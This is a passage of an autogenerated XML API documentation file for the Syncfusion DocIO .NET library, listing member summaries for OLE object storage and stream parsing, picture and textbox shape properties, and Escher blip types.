            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.SaveTo(System.IO.Stream,Syncfusion.DocIO.DLS.OleLinkType,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Saves the data to stream.
            </summary>
            <param name="stgStream">The STG stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.DEF_OLE_STREAM_NAME">
            <summary>
            The ole stream name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.m_oleType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.ParseObjectPool(System.IO.Stream,System.String,System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage})">
            <summary>
            Parses the object pool.
            </summary>
            <param name="objectPoolStream">The object pool stream.</param>
            <param name="oleStorageName">Name of the OLE storage.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.Save(System.IO.Stream,Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Saves the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="oleObject">The OLE object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.Save(System.Byte[],System.String,Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Saves the specified native data.
            </summary>
            <param name="nativeData">The native data.</param>
            <param name="dataPath">The data path.</param>
            <param name="oleObject">The OLE object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.AddOleObjectToCollection(System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage},System.String)">
            <summary>
            Adds the oleobject to the collection
            </summary>
            <param name="document"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WriteNativeData(System.Byte[],System.String,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Writes the native data.
            </summary>
            <param name="nativeData">The native data.</param>
            <param name="dataPath">The data path.</param>
            <param name="objType">Type of the object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WriteNativeData(System.Byte[],System.String)">
            <summary>
            Writes the native data.
            </summary>
            <param name="nativeData">The native data.</param>
            <param name="streamName">Name of the stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WritePBrush(System.Byte[])">
            <summary>
            Writes the embedded drawing.
            </summary>
            <param name="nativeData">The native data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WriteNativeStreams(System.IO.Stream)">
            <summary>
            Writes the native streams.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WriteCompObjStream(Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Writes the "CompObj" stream.
            </summary>
            <param name="objType">Type of the obj.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WriteLinkInfoStream(Syncfusion.DocIO.DLS.OleObjectType,System.String)">
            <summary>
            Writes the "CompObj" stream.
            </summary>
            <param name="objType">Type of the obj.</param>
            <param name="dataPath">The data path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WriteOleStream(Syncfusion.DocIO.DLS.OleLinkType,Syncfusion.DocIO.DLS.OleObjectType,System.String)">
            <summary>
            Writes the "Ole" stream.
            </summary>
            <param name="linkType">Type of the link.</param>
            <param name="objType">Type of the obj.</param>
            <param name="dataPath">The data path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WriteObjInfoStream(Syncfusion.DocIO.DLS.OleLinkType,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Writes the "ObjInfo" stream.
            </summary>
            <param name="linkType">Type of the link.</param>
            <param name="objType">Type of the obj.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.WritePackage(System.Byte[],System.String)">
            <summary>
            Writes the package.
            </summary>
            <param name="nativeData">The native data.</param>
            <param name="dataPath">The data path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.SetStorage(Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage)">
            <summary>
            Sets the storage of the oleobject
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.Guid">
            <summary>
            Gets or sets the GUID.
            </summary>
            <value>The GUID.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.Storage">
            <summary>
            Gets the storage.
            </summary>
            <value>The storage.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.OleType">
            <summary>
            Gets the type of the OLE object.
            </summary>
            <value>The type of the OLE.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEObject.Cloned">
            <summary>
            Gets or sets a value indicating whether this item is cloned.
            </summary>
            <value>
              <c>true</c> if cloned; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OleTypeConvertor">
            <summary>
            Class performs converting string to OleObjectType enum and vice versa.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OleTypeConvertor.ToOleType(System.String)">
            <summary>
            Converts the string to "OleObjectType"
            </summary>
            <param name="oleTypeStr">The OLE type STR.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OleTypeConvertor.ToString(Syncfusion.DocIO.DLS.OleObjectType,System.Boolean)">
            <summary>
            Converts the string to "OleObjectType"
            </summary>
            <param name="oleTypeStr">The OLE type STR.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OleTypeConvertor.GetGUID(Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Gets the GUID for specified type of object.
            </summary>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage">
            <summary>
            Class specifies storage with sub storages and streams.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage"/> class.
            </summary>
            <param name="storageName">Name of the storage.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.ParseStorages(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Parses the storages.
            </summary>
            <param name="storage">The storage.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.ParseStreams(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Parses the streams.
            </summary>
            <param name="storage">The storage.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.WriteToStorage(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Writes to storage.
            </summary>
            <param name="storage">The storage.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.GetByteArray(System.IO.Stream)">
            <summary>
            Gets the byte array of the stream
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.CompareStorage(System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage})">
            <summary>
            Compare storages
            </summary>
            <param name="document"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.UpdateGuid(Syncfusion.CompoundFile.DocIO.Net.CompoundFile,System.Int32,System.String)">
            <summary>
            Updates the GUID.
            </summary>
            <param name="cmpFile">The CMP file.</param>
            <param name="storageIndex">The index.</param>
            <param name="storageName">The storage name</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.StorageName">
            <summary>
            Gets or sets the name of the storage.
            </summary>
            <value>The name of the storage.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.Streams">
            <summary>
            Gets the streams.
            </summary>
            <value>The streams.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.Storages">
            <summary>
            Gets the storages.
            </summary>
            <value>The storages.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage.OccurrenceCount">
            <summary>
            Gets/sets the occurrence of the OleObject
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.DEF_VERSION_CONSTANT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_streamLeng">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_oleVersion">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_flags">
            <summary>
            This MUST be set to 0x00000001 or 0x00000002. If this field has a value of 1, the OLEStream
            structure MUST be for a linked object. If this field has a value of 0, then the OLEStream
            structure MUST be for an embedded object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_linkUpdateOption">
            <summary>
            This field contains an implementation-specific hint supplied by the application or by a
            higher-level protocol that creates the data structure. The hint MAY be ignored on
            processing of this data structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_reserved1">
            <summary>
            This MUST be set to 0x00000000. Otherwise, the OLEStream structure is invalid.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_reservedMonikerStreamSize">
            <summary>
            This MUST be set to the size, in bytes, of the ReservedMonikerStream field.
            If this field has a value 0x00000000, the ReservedMonikerStream field MUST NOT be present.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_reservedMonikerStream">
            <summary>
            This MUST be a MONIKERSTREAM structure that can contain any arbitrary value 
            and MUST be ignored on processing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_relativeSourceMonikerStreamSize">
            <summary>
            This MUST be set to the size, in bytes, of the RelativeSourceMonikerStream field.
            If this field has a value 0x00000000, the RelativeSourceMonikerStream field MUST NOT be present.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_relativeSourceMonikerStream">
            <summary>
            This MUST be a MONIKERSTREAM structure that specifies the relative path to the linked object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_absoluteSourceMonikerStreamSize">
            <summary>
            This MUST be set to the size, in bytes, of the AbsoluteSourceMonikerStream field. 
            This field MUST NOT contain the value 0x00000000.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_absoluteSourceMonikerStream">
            <summary>
            This MUST be a MONIKERSTREAM structure that specifies the full path to the linked object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_clsidIndicator">
            <summary>
            This MUST be the LONG value -1
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_clsid">
            <summary>
            This MUST be the CLSID containing the object class GUID of the creating application.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_reservedDisplayName">
            <summary>
            This MUST be a LengthPrefixedUnicodeString that can contain 
            any arbitrary value and MUST be ignored on processing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_reserved2">
            <summary>
            This can contain any arbitrary value and MUST be ignored on processing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_localUpdateTime">
            <summary>
            This MUST be a FILETIME that contains the time 
            when the container application last updated the RemoteUpdateTime field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_localCheckUpdateTime">
            <summary>
            This MUST be a FILETIME that contains the time 
            when the container application last checked the update time of the linked object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_remoteUpdateTime">
            <summary>
            This MUST be a FILETIME that contains the time when the linked object was last updated.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_linkType">
            <summary>
            The type of the link;
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.m_filePath">
            <summary>
            Path to linked file
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream"/> class.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.#ctor(Syncfusion.DocIO.DLS.OleLinkType,System.String)">
            <summary>
            Initializes a default instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.SaveTo(System.IO.Stream)">
            <summary>
            Saves to compound stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream.m_Clsid">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream.m_streamData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream.m_stringData">
            <summary>
            Path to file
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.MonokerStream.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.DEF_STRUCT_LEN">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.m_data1">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.m_data2">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.m_data3">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.m_data4">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.OLEStream.CLSID.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps">
            <summary>
            Summary description for PictureShapeProps.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps.m_brightness">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps.PictureBrightness">
            <summary>
            Gets/sets picture brightness.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps.PictureContrast">
            <summary>
            Get/set picture contrast.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps.PictureColor">
            <summary>
            Get/set picture color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps.AlternativeText">
            <summary>
            Gets or sets the picture's alternative text.
            </summary>
            <value>The alternative text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps.Name">
            <summary>
            Gets or sets the name.
            </summary>
            <value>
            The name.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.Rect">
            <summary>
            Summary description for Rect.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.Rect.m_left">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.Rect.m_right">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.Rect.m_top">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.Rect.m_bottom">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.Rect.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.Rect.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.Rect.Left">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.Rect.Right">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.Rect.Top">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.Rect.Bottom">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer">
            <summary>
            Summary description for SPContainer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.DEF_MSOFBH_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.DEF_SP_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.DEF_FOPTE_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.DEF_RECT_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.m_sp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.m_opt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.m_anchor">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.m_msofbhArray">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.Read(System.IO.Stream,System.UInt32)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="lenght"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.ReadFoptes(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="msofbh"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.WriteFoptes(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.GetFoptesLength">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.GenerateDefaultOPT">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.WriteFSP(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.SPContainer.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.m_txbxLineWidth">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.#ctor">
            <summary>
            Default constructor
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.NoLine">
            <summary>
            Get/set value which defines if
            there is a line around textbox shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.WrapText">
            <summary>
            Get/set wrap text mode
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.FitShapeToText">
            <summary>
            Gets or set a value indicating whether to resize the textbox based on the contents.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.LineStyle">
            <summary>
            Get/set line style for textbox
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.FillColor">
            <summary>
            Get/set textbox fill color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.LineColor">
            <summary>
            Get/set line color.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.TxbxLineWidth">
            <summary>
            Get/set textbox line width
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.LineDashing">
            <summary>
            Get/set line dashing for textbox
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.TXID">
            <summary>
            Get/set TXID value;
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.LeftMargin">
            <summary>
            Gets or sets the left margin.
            </summary>
            <value>The left margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.RightMargin">
            <summary>
            Gets or sets the right margin.
            </summary>
            <value>The right margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.TopMargin">
            <summary>
            Gets or sets the top margin.
            </summary>
            <value>The top margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps.BottomMargin">
            <summary>
            Gets or sets the bottom margin.
            </summary>
            <value>The bottom margin.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI">
            <summary>
            Summary description for MSOBlipType.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiUNKNOWN">
            <summary>
            Unknow
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiWMF">
            <summary>
            Metafile header then compressed WMF
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiEMF">
            <summary>
            Metafile header then compressed EMF
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiPICT">
            <summary>
            Metafile header then compressed PICT
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiPNG">
            <summary>
            One byte tag then PNG data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiJFIF">
            <summary>
            One byte tag then JFIF data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiJPEG">
            <summary>
            One byte tag then JPEG data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiDIB">
            <summary>
            One byte tag then DIB data
            </summary>
        </member>
